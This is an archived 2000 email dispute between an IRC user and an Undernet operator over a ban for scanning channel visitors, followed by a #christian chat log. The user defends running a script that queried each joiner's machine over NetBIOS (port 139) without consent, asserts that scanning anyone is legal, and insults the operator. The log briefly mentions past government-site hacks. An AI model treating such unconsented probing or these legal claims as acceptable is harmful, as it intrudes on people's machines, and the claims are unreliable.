>Sorry. It's not illegal nor against undernet polic y to>treat somebody with less then perfect respect. Go>nanny somebody else.>>> Just because you CAN hit a child doesn't mean>> it's the proper thing to do and most of our>undernet > guests are virtual children. We don't t ake>advantage > of that fact.>>I didn't hit anybody. And I'm getting pretty sick and>tired of your bullshit excuses CiCi. Admit it, You>don't like me, so You gline me.>>> I'm not Chaplain. Get your people straight. The re>> is more than one person here who has been effec ted>> by your actions and AFAIK Chaplain isn't readin g>> this email.>>You wanna back this one up as well Please? I like>evidence, I'm a strong believer in it. The more BS you>talk (which btw, you can't actually backup) the le ss>respect I have for you.> >> I told you nothing of the sort. Once again, get your>> people straight. >>OH YES, Yes you did. I have that Log at work; I sh all>retrieve it. You made it perfectly clear in your o wn>words that I had been reported (laugh laugh) to th e>authorities for my "hacking" chaplain. >>> It is my understanding that Chaplain has contact ed >>his church's attorney and that since you both liv e >>in the same state, there is merit for suit.>>Cici, I've been as patient and forgiving as I'm go ing>to be. The rest of this email may be rude; I'm not>trying any longer to make it not be. Had you looke d at>all on the laws governing this state; Chaplain has n't>got a pot to piss in. However, I can and will win a>counter suit; Although I know churches don't have alot>of money, I'll counter sue for the point of it.>> OK, if you weren't using undernet bandwidth, exp lain>> how you knew the IP/host information of the peop le >*yawn* Remember when I said I had lost my patience ?>Well, get ready for a computer lesson; Seems damn time>somebody told you. It doesn't use undernet bandwid th>to /whois someone, nor does it really do anything when>you /dns somebody. My script didn't use any of you r>precious bandwidth, because (oh dense one) it>establishes direct connection via a socket call. S hall>I get any more technical, or can you understand th is?>>>> their consent. The>> "consent" part is the difference between your sc ans>> and the proxy scans Undernet does. If you read t he >>motd of most servers, you'll see that it is discus sed>> there. >>Indeed I have, and guess what. If somebody really>wanted to "sue" undernet for scanning them, your m otd>wouldn't do shit for you. Know why? Because it's l ike
>a shrinkwrap software license; It won't actually h old>up in court. But it sounds good.>>>> to Undernet. You made>> none of this information available to people who>> entered the channel and you had no permission fr om >>them to scan their machines.>>Technically, I didn't scan anybody. Second, I don' t>actually need their permission to scan them. It's not>illegal to port scan any machine you desire. It>becomes illegal if you attempt to gain unauthorize d>entry into the machine once you have scanned It.>scanning is like knocking on the door or calling>somebodys house to see if there home. For an ircop ,>You really don't know much about the internet, nor the>laws gonverning it.>>> Calling someone a lamer doesn't sound like my id ea>> of nice and telling them to "consider this a>threat" > doesn't sound very kind either.>>Still quoting me out of context? :) Why don't you>email us a copy of the entire log cici, so we can put>it in the proper context. I was nice enough to tel l>him he had a problem to begin with; You seem to ha ve a>very hard time with this very very simple concept. I>really don't know what to think of you anymore. I>already know your computer knowledge leaves much t o be>desired, and in my opinion; You aren't qualified t o be>an ircop.>>But lucky for you, It's not in my power to make th ose>decisions.>>> I don't have a personal problem with you so the rest>> of the above paragraph is of no concern.>>I'm not letting you wiggle out of this CiCi. Glini ng>me went a little too far. According to the wonderf ul>christian log, You glined me after I had already t old>you (after your attempt to start shit with me when I>joined) that the script was no longer scanning>anybody. I set away to get some food, then you gli ned>me. You can't get out of it. That's how it went do wn,>and you know it.>>>> My problem with you was that you were sitting on >>Undernet scanning the machines of each person join ing>> a channel.>>I'm an op in several security related channels, It is>our channels policy to scan all visitors; or they are>not welcome. My script does not currently distinqu ish>between only those channels and all channels I mig ht>be visiting in. However, it is to be said; You and>Chaplain are the ONLY people I've scanned and info rmed>they had a problem that weren't happy to know. The y>say I suppose that ignorance is bliss, but in the>computer age; this will kill you.>
>Your problem with me is a personal one, Otherwise you>would not have glined me yesterday; As you knew we ll>infact that I was no longer scanning anybody (As I had>told you). How do you defend that gline anyway CiC i?>What undernet rule at the time was I in violation of?>Please, enlighten me :)>>> I was told yesterday that I had been accepted as an>> Op in #christian.>>I don't know. I was speaking with the channel>administrator; He assured me I'd have no further>problems from you. :) Whether your op status is>affected isn't my concern, I just don't want any m ore>hassle from you. I know you've overstepped your>authority, and you know it. >>> I have now declined that offer until this matter is>> settled.>>The matter can easily be settled, Don't gline me f or>bullshit, and apologize for the bullshit gline you did>set on me, and I'll drop the entire issue. >>> Once again, scanning for open ports and then >>intimidating the machine owner when they say >>something you dislike borders on extortion and it' s >I didn't scan for open ports. Computer lesson numb er 2>(seems you can't learn any other way, I am forced to>be rude) my script sent net view ''$ip one time, w hich>attempts to connect to port 139; For Netbios>information, NOT OOB nuking. I already know this i s>above you, But I'm going to explain exactly what I did>anyway; Just because it's beyond you doesn't mean>somebody else reading this email won't understand what>I'm talking about.>>And again, I must ask you to provide proof that I was>intimidating anybody. Sigh, I lose more and more>respect for you with each email me thinks. I don't>extort anybody. >>> If you weren't on undernet, you wouldn't know wh o >>joined the channels here.>>I've been a regular on undernet for several years.>I've never had a problem like this before. And it' s>not really a problem... You had no valid reason to>gline me, and you did; And I'm going to press this>issue until it's resolved. If that means I have to>make you look like a total idiot with regard to>computers, I'll do so (mind you, it wouldn't take any>effort; These emails and the logs I have show it>without a doubt). A wrong must be righted.>>CiCi, You know your gline was not legit. You know it.>I know it. Why don't you apologize for doing it? I t>seems like a christian thing to do.> >> I've carbon copied him on this as well. Gator i s a>> very good person and does many things for Undern et >>that he never gets praise he deserves.>
>I've known gator for sometime, he knows some>associates I used to frequent with. WarBlade and>crew...>>> What you may not be aware of is that both Gato r>and > I got copies of Chaplians log files sent to>abuse > the day before. We both have access to the>chat>>Then why are you still quoting it out of context? I>didn't do anything illegal to Chaplain; I may have>saved him some serious downtime. I do admit tho, I f I>had known I'd be in this BS for doing it, I'd have not>said not one word. In the future, I'll keep my mou th>shut. Ignorance is bliss, right? :)>>>> >> Many of us who work on the net do not open>> attachments for obvious reasons.>>A LOG file is a text file, opening it in notepad w ill>not infect you. Please don't force me to give you a>lesson in virus terminology. I have very good>withstanding creditials in that field. How many>"scriptkiddys" (thats what you called me once righ t?>;p) do you know in Rolling Stone magazine? :-)>>> I'm sure there is nothing malicious in your logs ,>> but it's just a rule of thumb we use to avoid>>problems. >>Lack of education creates rules that are sometimes not>necessary.> >> The reason I got involved in this was because yo u>> were not only scanning people without permission as>> they entered that channel>>(a) I don't need their permission. and (b) I don't>even have to tell them either beforehand or after that>I scanned them. And I don't scan people. >>> but also because you were using the information from>> those scans to threaten people when they did not >>behave in the manner you desired.>>Nice try! I didn't threaten anybody; I helped his>sorry ass out. I didn't use any of the information in>any illegal nor immoral manner. I did a christian>thing a told the bastard he had a problem. I shoul d>have let him suffer with it. Stupidty seems to be>uncurable. >>> If you have indeed stopped>> scanning people as they enter a channel, you hav e>> solved the problem that was my issue.>>Your "issue" isn't of any concern to me anymore. Y our>gline and abuse of oline is. You glined me after I>already told you I stopped, thats just plain outri ght>wrong. I wasn't doing anything against undernet po licy
>to begin with, but to gline me after I already sai d I>wasn't doing it anymore is bullshit. Espicially si nce>you didn't gline me on entry, you said a wiseass>comment about me in open channel. When I responded I>was glined shortly there after. And I bet without a>doubt; it had nothing whatsoever to do with chapla in.>I strongly suspect you didn't like my response to your>wiseass comment. >>If theres a lesson to be learned here, it's to all ow>the stupid and ignorant to remain that way; It's f or>the best.>>Regards,>Raid>>PS: I didn't have time to enter gators email; I'm>trusting you to send him this intact... See if you can>do that. Ok?>>>__________________________________________________>Do You Yahoo!?>Yahoo! Mail - Free email you can access from anywh ere!>http://mail.yahoo.com/>From John Grahms Mon Sep 11 05:51:48 2000 Received: from [205.245.105.248] by web1609.ma il.yahoo.com; Mon, 11 Sep 2000 05:51:48 PDT Date: Mon, 11 Sep 2000 05:51:48 -0700 (PDT ) From: John Grahms <[email protected]> | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 813
Add Addresses
--- "L. Maurer" <[email protected]> wrote:> Here's a copy of this kid's latest crap. I've ha d> enough of this. Sitting in a channel and port >scanning everyone who joins is not a good thing.> Continuing his arguement with me about it is tota lly> stupid.
This Kid isn't a kid. As I've told you once already .Your quiet correct; This entire arguement is stupid ,You don't know the difference between port scanningand netbios; and you don't know a damn thing aboutnetbios. Your clearly not qualified for your positi on.
You can have enough of it all you like, I didn't po rtscan anyone and I'd strongly suggest you learn whatport scanning is.
Regards,Raid
From John Grahms Wed Sep 13 09:55:45 2000 Received: from [208.25.255.2] by web1608.mail. yahoo.com; Wed, 13 Sep 2000 09:55:45 PDT Date: Wed, 13 Sep 2000 09:55:45 -0700 (PDT ) From: John Grahms <[email protected]> | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" <[email protected]> CC: [email protected] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-4242383 35-968864145=:3039" Content-Length: 22567
Add Addresses
--- "L. Maurer" <[email protected]> wrote:> Here's a copy of this kid's latest crap. I've ha d> enough of this. Sitting in a channel and port >scanning everyone who joins is not a good thing.> Continuing his arguement with me about it is tota lly> stupid.
Hi Lisa,
How many times do I have to tell you I'm not a kid? :)When will you learn this?
That log where you said I would be contacted by theauthorities has been attached. I've also forwarded anemail from you to the administration of Christian;They were as shocked to find you had been accepted asan Op as I was. Next time you try Bsing your way ou tof something, make sure you have all your basescovered.
You also asked in a previous email to me How I wasshowing private logs between chaplain and somebodyelse? I didn't read that section of the emailbeforehand; I've gone back and read them. How DARE youeven accuse me of something like that? I did NOT atany time get any logs that my computer didn't creat e.And I am requesting, Nay.. Demanding you show someproof for these outrageous claims you've made again stme.
You realize CiCi, it's a good thing from a legal/mo neyaspect this is IRC; Because if you were pulling thi sshit in real life, I'd sue the living shit out of y ou.
Since I don't normally log from work, what is attac hedis a buffer save. (I saved it just after you left t hechannel, I figured it would come in handy).
I'm looking forward to your next installment of lie s.
Regards,Raid
PS: I've carbon copied this email to myself Forarchive purposes.
__________________________________________________Do You Yahoo!?Yahoo! Mail - Free email you can access from anywhe re!http://mail.yahoo.com/
-- I don't remember when this took place or how it really fits into myarticle. LoL. Ah well.
Session Start: Sat Sep 09 00:00:00 2000[00:00] <Jubei> I don't like the appointed senate[00:00] <gen|c0de> then it was passed to the public , where it became affectionatly known as the internet and the public made it boom[00:00] <Jubei> Nor do I like the heavy beauracracy ... but for all that it's okay[00:00] <damrekcah> gen|c0de: it was called ARPAnet[00:00] *** fayth ([email protected]) has joined #christian[00:00] <Vote4Bush> lan.. im just tired of the jr t hing. he's not a jr, whereas mr al gore IS[00:00] <gen|c0de> arpa[00:00] <gen|c0de> yea[00:00] <gen|c0de> sorry[00:00] <damrekcah> or DARPA.. i can't remember... darpanet i think[00:00] *** `Paradox ([email protected]) has left #christian[00:00] <gen|c0de> it was ARPAnet[00:00] <CiCi> it was just arpa[00:01] <gen|c0de> regardless[00:01] <CiCi> and it didn't have a .net[00:01] <Lanfear`> vote: how bout we just call him Bubba? ;)[00:01] <Jubei> Though my government could certainl y use reform... but then there has never been a perfect government either[00:01] <Vote4Bush> dubya is fine with me[00:01] <Vote4Bush> clinton is bubba[00:01] <Lanfear`> no.. I said BUBBA ;)[00:01] <Dovi-dude> Jubei, no, trying to say that N eo in the matrix was more like what the Jewish messiah was percieved to be, rather than wha t jesus was like[00:01] *** cierra ([email protected]) has left #christian[00:01] <Jubei> Lanfear> Check side window please[00:01] <gen|c0de> net not .net[00:01] <Jubei> Ah, I never saw the Matrix[00:01] <damrekcah> one of my professors is getting millions of dollars in research funding for creating new faster networks for the military[00:01] <Vote4Bush> i know whatcha said[00:01] <Dovi-dude> a warleader, destined to free h is people[00:01] <damrekcah> darpa is funding him
[00:01] <gen|c0de> the military doesnt need speed[00:01] <CiCi> ok gen I"m sure you know more than I do, I was only trained by the folks involed in arpa :)[00:02] <Lanfear`> jubei: I don't see anything in i t from you recently[00:02] <gen|c0de> CiCi: is that why you didnt even know about netbios shares?[00:02] <damrekcah> gen|c0de: what it is about is c reating high speed wireless networks in battlezones....[00:02] *** `Ash` ([email protected]) has left #christian[00:02] <Jubei> Dovi> I don't think that's what the jews beleived at all. The young hot-headed jews who want to fight maybe, but not th e jewish religious authorities or scholars[00:02] <damrekcah> that's what he's doing[00:02] <Dovi-dude> ah, Jubei you should see it. Ex cellent film, raised the standards for movie sf :) [00:02] <gen|c0de> damrekcah: doesnt matter they ca nt secure it worth a shit[00:02] *** wallace-7 ([email protected]. lsan03.pacbell.net) has left #christian[00:02] <gen|c0de> the enemy will use their bandwid th[00:03] <gen|c0de> lol[00:03] <Colin^> gen|c0de watch the language[00:03] *** HARDPENIS ([email protected] .tnt2.lnh.md.dialup.rcn.com) has joined #christian[00:03] *** logos3 sets mode: +b HARDPENIS!*@*[00:03] <CiCi> gen I know about netbios shares :) and I don't threaten to destroy people's machines when they're open... it's called maturity, mabe you've heard of it[00:03] *** HARDPENIS was kicked by logos3 (banned: That nick is inappropriate on this channel)[00:03] *** BrownEye ([email protected] 2.lnh.md.dialup.rcn.com) has joined #christian[00:03] *** Colin^ sets mode: +b *!*DIE@*.rcn.com[00:03] *** BrownEye was kicked by logos3 (Banned)[00:03] *** ramdac ([email protected]. da.uu.net) Quit (Ping timeout for ramdac[1Cust114.tnt2.ruston.la.da.uu.net])[00:03] <gen|c0de> CiCi: speaking of maturity, was that supposed to be a subtle insult?[00:03] *** Maverick ([email protected] dise.net.nz) has joined #christian[00:03] <Jubei> They just beleived in the rise of a ruler that would guarantee the establishment of good and order in the world.[00:03] <gen|c0de> raid is a little ummm...how woul d you say? quick to jump the gun?[00:03] <gen|c0de> but hes a good guy[00:04] <Raid> shrug[00:04] <damrekcah> gen|c0de: do you honestly belie ve that we can't secure our networks? we have tons of phds working on this project... all of which probably know maybe *a little* bit more about computer networks than you do[00:04] <CiCi> gen I've had enough of your crap bot h in private message and in this channel, I'm leaving and I hope you learn manners soon[00:04] *** CiCi ([email protected]) has left # christian[00:04] <Dovi-dude> depends, Jubei. I'd have to res earch a bit more on that.[00:04] *** newzeal ([email protected]. co.nz) has joined #christian[00:04] <Maverick> Back.[00:05] <PaganJoy> wb Maverick[00:05] <Vote4Bush> doo de dop bu dee doo le da di t de doo[00:05] <rts> hmm. Really, there's no such thing as a "secure network", so long as it is connected to the outside world in some way[00:05] <Dovi-dude> wb Mav[00:05] *** Nell` ([email protected]. grid.net) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius)[00:05] <Maverick> Thanks.[00:05] <Raid> rts: thats supposed to be one of the first things you learn regarding networks.[00:05] * Lanfear` thinks cici is starting to sound like chap ;)[00:05] <damrekcah> rts: but its not connected to t he outside world!!!!!!! we aren't talking about the internet here[00:05] <Raid> Lanfear`: careful now, she might gli ne you. ;p[00:05] <gen|c0de> damrekcah: I think that the rece nt attacks against like the pentagon and the whitehouse where people used techniques that ar e wicked outdated to get access to the server proves we dont
[00:05] <Vote4Bush> is anyone doing something fun t his weekend?[00:06] <rts> Raid: indeed[00:06] <gen|c0de> cici: ive been very respectful t owards you, to the point where its almost making me sick, and Im the one who needs to learn m anners?[00:06] <rts> damrekcah: your network is in no way connected to the outside?[00:06] <Raid> The only secure (as can be) computer is one that has NO outside connection.[00:06] <Raid> not even a dialup one.[00:06] *** ^dan- ([email protected] l.adsl.bellatlantic.net) has joined #christian[00:06] <Colin^> gen|c0de she is gone[00:06] <gen|c0de> oh[00:06] *** Colin^ sets mode: +b *!*[email protected] .*[00:06] *** fayth was kicked by Colin^ (message me please)[00:06] <damrekcah> not my network, the high speed military network they are developing[00:06] <damrekcah> the wireless done[00:06] <damrekcah> one[00:06] <gen|c0de> ah yes[00:07] <gen|c0de> soon we will have wireless netwo rk sniffers[00:07] <gen|c0de> wont even have to be connected t o the network[00:07] *** ironic^^ ([email protected]) has joine d #christian[00:07] <damrekcah> it can be secured[00:07] <rts> heh... just send a flock of birds up to knock that one down :)[00:07] <gen|c0de> damrekcah: do you remember when whitehouse.gov got defaced?[00:07] <Re[D]eemd> since wireless is broadcast by radio wave......you will open yourself to all kinds of security holes[00:08] <damrekcah> no, but whitehouse.gov isn't pa rt of the pentagon and dod which has a lot of sensitive info[00:08] *** logos3 sets mode: -b HARDPENIS!*@*[00:08] <gen|c0de> that attack was VERY old ( phf e xploit ) you can hardly find any computer still running it[00:08] <gen|c0de> ok dam[00:08] <gen|c0de> a while back DISA I believe it w as got hacked[00:08] <gen|c0de> wanna know how?[00:08] <Dovi-dude> eventually the safest thing to do, if you need high security, would probably be to store records offline :)[00:08] * Maverick checks out the Matrix as Messiah movie site.[00:08] * Maverick takes the Red Pill.[00:08] <Vote4Bush> red pill eh?[00:08] <gen|c0de> the attacked an employee's home computer and then let him log in[00:08] <gen|c0de> the pentagon's be hacked thousan ds of times[00:09] <gen|c0de> only a few have gone public[00:09] <damrekcah> gen|c0de the pentagon and DOD h ave security holes on different levels on purpose so they can catch the people[00:09] <gen|c0de> the most public one used brute f orce cracking, which is a form of password guessing[00:09] <Raid> damrekcah: Uhh, No...[00:09] *** HotPink ([email protected]) has joined #christian[00:09] <HotPink> hey[00:09] <gen|c0de> damrekcah: its called a honeypot , and none of what ive mentioned we honeypots[00:09] <Raid> damrekcah: If you believe most of th e hackers get caught, your sadly mistaken.[00:09] <Vote4Bush> hey hotpink[00:10] <Dovi-dude> hi hotpink[00:10] <gen|c0de> when the whitehouse got hacked[00:10] <damrekcah> raid: i'm not saying that.. i'm just saying how its setup[00:10] <gen|c0de> it was by stupid people[00:10] <damrekcah> i'm tired of talking about this[00:10] <gen|c0de> i know them[00:10] <gen|c0de> they got caught[00:10] <Raid> lol[00:10] <damrekcah> i'm going to listen to some mus ic[00:10] <damrekcah> bye[00:10] *** damrekcah ([email protected] u) has left #christian
[00:10] <HotPink> yo[00:10] <gen|c0de> but what about the hundreds of a ttacks that followed their arrest[00:10] <gen|c0de> no offense[00:11] <gen|c0de> but how come christians get huff y puffy and leave when their wrong?[00:11] <HotPink> not all christians do[00:11] <HotPink> please don't generalize[00:11] <rts> gen|c0de: even if they're right: it's the disagreement they don't like, I think[00:11] <gen|c0de> yes, i shouldnt have generalized[00:11] <HotPink> were humans just like anyone else with opinions[00:12] <gen|c0de> rts: I just moved away from tuls a ok, they love to argue when their right[00:12] <gen|c0de> sorry again generalizitation[00:12] <gen|c0de> i used to work next door to oral roberts university[00:12] <HotPink> it's cool[00:12] <HotPink> just making a point[00:12] <HotPink> :)[00:12] <rts> gen|c0de: heh. Looneyville by the sou nds of it[00:12] <gen|c0de> well accross the street[00:12] <gen|c0de> rts: they've got two of the larg est christian colleges there are[00:13] <rts> gen|c0de: they = Tulsa or they = Oral Roberts?[00:13] <gen|c0de> ah yes rheama ( sp? )[00:13] <gen|c0de> tula[00:13] <gen|c0de> oru is one of the colleges[00:13] *** creeper has left IRC[00:13] <gen|c0de> rheama bought just about everyth ing in this town[00:13] *** Kozubchik ([email protected]) has joined #christian[00:13] *** ^dan- is now known as dan-[00:13] <gen|c0de> and strictly restricts it to rhe ama students[00:13] <rts> forgive me, but "Christian College" s ounds like "military intelligence" to me :)[00:13] <Colin^> Hi ya Kozubchik[00:13] -> *dan-* back now?[00:13] <gen|c0de> lol rts[00:13] <HotPink> well[00:13] <gen|c0de> it is[00:14] <HotPink> i fully intend on[00:14] <HotPink> going to[00:14] <HotPink> a christian college[00:14] *** laura7 ([email protected]) has jo ined #christian[00:14] <Vote4Bush> which one[00:14] <Dovi-dude> rts, nah,, thats how georgetown , yale, etc started as, remeber? :)[00:14] <HotPink> trinity christian college[00:14] * Vote4Bush is going to a Christian college next fall[00:14] *** Disconnected[00:14] * Raid is away since 00:14:31 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[00:14] *** Attempting to rejoin...[00:14] * Raid has returned ( Auto-Away: Not here ) - on 00:14:34 @ 09/09/2000 - Away 0 minutes.#Christian Cannot send to channel[00:14] *** Rejoined channel #christian[00:14] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[00:14] *** Set by Beukeboom on Fri Sep 08 03:42:55[00:14] -logos3- http://www.forchrist.net - channel website, for rules and other info.[00:14] <Vote4Bush> i will probably go to johnson b ible college in knoxville TN[00:14] <Colin^> wb Raid[00:14] <Raid> sigh[00:14] <Raid> Vote4Bush: It's an interesting place .[00:14] <HotPink> don't go to milligan[00:15] <gen|c0de> HotPink: youd be better off goin g to a regular college, most of the people ive encounterd at those colleges are far fro m what youd call a christian[00:15] *** Colin^ sets mode: -b *!Hell@*.sympatico .ca[00:15] <Vote4Bush> lol im not going to milligan[00:15] <gen|c0de> they get their all hot for jesus[00:15] *** ironic^^ ([email protected]) Quit (Pin g timeout for ironic^^[203.170.14.152])
[00:15] <HotPink> gen-well good for them[00:15] <Vote4Bush> friend going there though[00:15] <HotPink> they should get a cookie[00:15] <HotPink> but i'm not them[00:15] <Vote4Bush> raid you know johnson? or jus t knoxville?[00:15] <gen|c0de> within a year they fall off the train per se[00:15] <HotPink> milligan is so full of crap[00:15] <Raid> Vote4Bush: both. hehe[00:15] <HotPink> like half of the kids there smoke and drink[00:15] <Raid> Vote4Bush: I went to johnson for a s ervice contract; I'm one of the techs that fixes their stuff.[00:15] <Colin^> HotPink watch the language please[00:15] * HotPink watches[00:15] <HotPink> yep[00:16] <HotPink> there it is[00:16] <gen|c0de> crap?[00:16] <HotPink> heh[00:16] <Vote4Bush> oh, alright. you probably met my uncle, he is dealing with most of that[00:16] <gen|c0de> whats wrong with that?[00:16] *** ironic^^ ([email protected]) has joine d #Christian[00:16] <HotPink> yeah[00:16] *** satiaKat ([email protected]. net) has joined #Christian[00:16] <HotPink> i'm baffled too[00:16] <HotPink> anyway[00:16] <Vote4Bush> how is it full.... hotpink?[00:16] <gen|c0de> how come you didnt say anything to me for using the lords name in vein??[00:16] <HotPink> because they claim be strict[00:16] <HotPink> and all for god and not allowing that stuff[00:16] <HotPink> heh[00:16] <gen|c0de> thats more of a 'crime' then say ing crap[00:17] <HotPink> and they just act like it doesn't happen[00:17] *** Colin^ sets mode: +b *!*generic@*.quik. com[00:17] *** gen|c0de was kicked by Colin^ (This ran dom kick message was censored by popular request)[00:17] <Vote4Bush> um[00:17] <HotPink> your such a hypocrite[00:17] <Vote4Bush> did he just like... ask to be k icked?[00:17] <HotPink> that was so stuppid[00:17] *** Kozubchik ([email protected]) Qui t (†[C-Script]† - www.C-Script.com and irc.C-Script.com)[00:17] *** Colin^ sets mode: +b *!piglet@*.mvn.net[00:17] *** HotPink was kicked by Colin^ (I'm only doing this because I care)[00:17] <thumps> ;)[00:17] *** laura7 ([email protected]) Quit ( Leaving)[00:17] <Vote4Bush> arg[00:17] *** satiaKat ([email protected]. net) Quit (GOD IS AWSOME!!!..............ALL THE TIME!!!!)[00:18] <Vote4Bush> whassup thumps[00:18] <thumps> Vote4Bush: not much[00:19] <YinsMom> see ya later thumps....bye room[00:19] *** YinsMom ([email protected]. EDU) has left #Christian[00:19] * PaganJoy hugs thumps till her has a Victo rian cinched waistline[00:19] <PaganJoy> her = he[00:20] <thumps> hahah pags[00:20] <Maverick> Scary.[00:20] *** newzeal ([email protected]. co.nz) has left #Christian[00:20] <Dovi-dude> night room, peace[00:20] *** Dovi-dude ([email protected] .net) has left #Christian[00:21] * thumps hugs pags till she ............sez yes[00:21] <PaganJoy> ooh la la[00:21] <Lanfear`> to what?[00:21] <thumps> ;)[00:21] <Vote4Bush> heh
[00:22] *** Re[D]eemd ([email protected] e.com) Quit (Mental floss with God's Word daily to prevent truth decay!)[00:22] * Colin^ could do with a nice cup of tea[00:23] <Raid> Hmmm[00:23] <Raid> Thats actually a cute quit msg[00:23] * Vote4Bush boils some water for tea[00:24] <rts> except the idea of flossing one's bra in doesn't sound so appealing[00:24] <rts> you'd probably.. damage something, I' m sure[00:24] <Vote4Bush> lol[00:25] <rts> "Ow, my frontal lobe... *drool*"[00:25] * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and del ightful and he inhales it deeply with relish as he glances about looking for interesting conversation.[00:26] <Raid> hmmm[00:26] <Colin^> thumps can send you a home lobotom y kit to try rts[00:26] <Raid> I have migraines alot as it is, I th ink that would make it worse.[00:26] <Maverick> Pipetobak: I'm sure those auto-s cripts of yours get longer every time I see then.[00:26] <Raid> shrug.[00:27] * thumps reaches for his sharp fork[00:27] <Raid> Maverick: He does it to annoy you. ; p Everytime you complain, it grows by 2 lines. <G>[00:27] <Maverick> LOL[00:27] <Maverick> Really Raid?[00:27] <Raid> no hehe[00:27] <rts> Colin^: cool[00:27] <Raid> but it sounded good didn't it? ;)[00:27] *** fitzfield ([email protected]) has jo ined #Christian[00:27] <rts> 'cause you know, I just have way too much brain[00:27] <Colin^> Pipetobak changes them often[00:28] *** ramdac ([email protected]. da.uu.net) has joined #Christian[00:28] <Colin^> yesterday was one liner and I almo st fainted[00:28] <Lanfear`> one liner?[00:28] *** Adar_Caan ([email protected]. home.com) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Unde rnet.Org)[00:28] *** Jubei ([email protected]) Quit (N ewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)[00:29] <Lanfear`> oh..[00:29] <Lanfear`> never mind[00:29] * Vote4Bush blows everyone a kiss goodnight[00:29] *** Vote4Bush ([email protected] est.net) Quit (Friends don't let friends vote democrat.)[00:29] *** Adar_Caan ([email protected]. home.com) has joined #Christian[00:29] <Pipetobak> Yes I do, Colin. To keep it in teresting for all.[00:29] <Maverick> I can believe that.[00:29] <Maverick> The day he floods the channel fo r it Colin^, you should kick him;-)[00:29] *** Jubei ([email protected]) has joi ned #Christian[00:29] *** Jubei ([email protected]) Quit (L eaving)[00:30] *** Jubei1 ([email protected]) has jo ined #Christian[00:30] <thumps> and break the silence or idle chat ?[00:30] <rts> shh[00:30] <Jubei1> I say we idle chat[00:31] *** just_gal ([email protected]) Quit (#kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #s)[00:31] <Pipetobak> Why should I be kicked? I neve r flood the channel.[00:32] <Pipetobak> I merely send an image of me so you may better visualize me as you speak to me.[00:32] <Colin^> :o)[00:33] * Maverick checks out more Matrix sites.[00:33] *** Colin^ sets mode: -b *!*@supernal.godse y.net
[00:33] *** maiang ([email protected]) has joined #Christian[00:33] *** fitzfield ([email protected]) Quit ( Ping timeout for fitzfield[202.78.95.104])[00:33] <Maverick> Boy.[00:33] <Maverick> Its gone kinda quiet.[00:33] <Maverick> Am I lagged?[00:33] <Maverick> Or has everyone decided I am not worth listening to?[00:33] * Maverick decides about this.[00:33] *** LadyViv ([email protected] .net.au) has joined #Christian[00:33] *** logos3 sets mode: +b *!*@*.one.net.au[00:33] <Colin^> is chatting in message[00:33] *** LadyViv was kicked by logos3 (banned: I SP banned: Continued illegal activity by one user)[00:33] *** Colin^ sets mode: -o Colin^[00:34] <Maverick> I canna find my glasses.[00:35] <Colin^> Mine are on my nose[00:35] *** ironic^^ ([email protected]) Quit (SoM EdAy, SomHoW, FaR bEyOuNd 2 DaY i WiLl FiNd ThE wAy 2 FiNd U bUt SoMeHoW tHrU tHe LoNlYnIg hT i Will LiVe ThE In ThE dArK tHaT U r n2 My HeArt LoVe U .(.KATE))[00:35] * rts is away: not here[00:35] *** rts ([email protected] ome.com) has left #Christian[00:35] *** Pipetobak ([email protected] ager.net) Quit (Leaving)[00:36] <Maverick> Oh my goodness I was lagged.[00:36] *** Pipetobak ([email protected] ager.net) has joined #Christian[00:36] <thumps> wb pipe :)[00:37] <Maverick> Oh my goodness I was lagged.[00:37] *** sansan` ([email protected] da.psi.net) has joined #Christian[00:37] <Maverick> Why didn't anyone tell me?[00:37] <Maverick> huh?[00:37] <Maverick> :P[00:38] <Maverick> =)[00:38] *** FuNNy ([email protected]) has joined #Christian[00:38] *** fitzfield ([email protected]) has jo ined #Christian[00:39] *** eagles` ([email protected]. uu.net) has joined #Christian[00:39] <FuNNy> hi..[00:39] <Colin^> hey eagles[00:39] <eagles`> hey Colin^... just sent you an ic q lol[00:40] *** Dawn ([email protected] ) has joined #Christian[00:40] <FuNNy> colin??[00:40] *** fitzfield ([email protected]) Quit ( Broken pipe)[00:40] <Dawn> hi, i'm new to this site[00:41] <eagles`> hello Dawn... nice to meet you[00:41] *** [Mo]- ([email protected]) has joined #Christian[00:41] <Dawn> nice to meet you to eagles[00:42] <FuNNy> hi dawn[00:42] <Dawn> hi FuNNy[00:42] <eagles`> you a Canadian, me an Ozzie Welsm an, lol, who speaks a little French :)[00:42] <FuNNy> hi[00:42] <Dawn> I am actually new to the whole IRC e xperience[00:43] <Raid> Dawn: Welcome.[00:43] <FuNNy> how r u dawn?[00:43] <eagles`> you are still welcome, happens to all of us at some stage :)[00:43] <Lanfear`> well.. I have to get up REALLY e arly[00:43] <Lanfear`> sigh sigh[00:43] <[Mo]-> i speak french[00:43] <Dawn> i am fine and how are you[00:43] <Lanfear`> on a saturday no less.. chat ya' ll later[00:43] * Colin^ speaks french[00:43] *** Lanfear` ([email protected] et) Quit (Leaving)[00:43] <Raid> sigh, bye lan.[00:43] <eagles`> enchante, [Mo]-[00:43] <[Mo]-> hehe[00:43] <[Mo]-> who can really speak french here?[00:44] <eagles`> un petit peu, mais ne pas dans ce channel
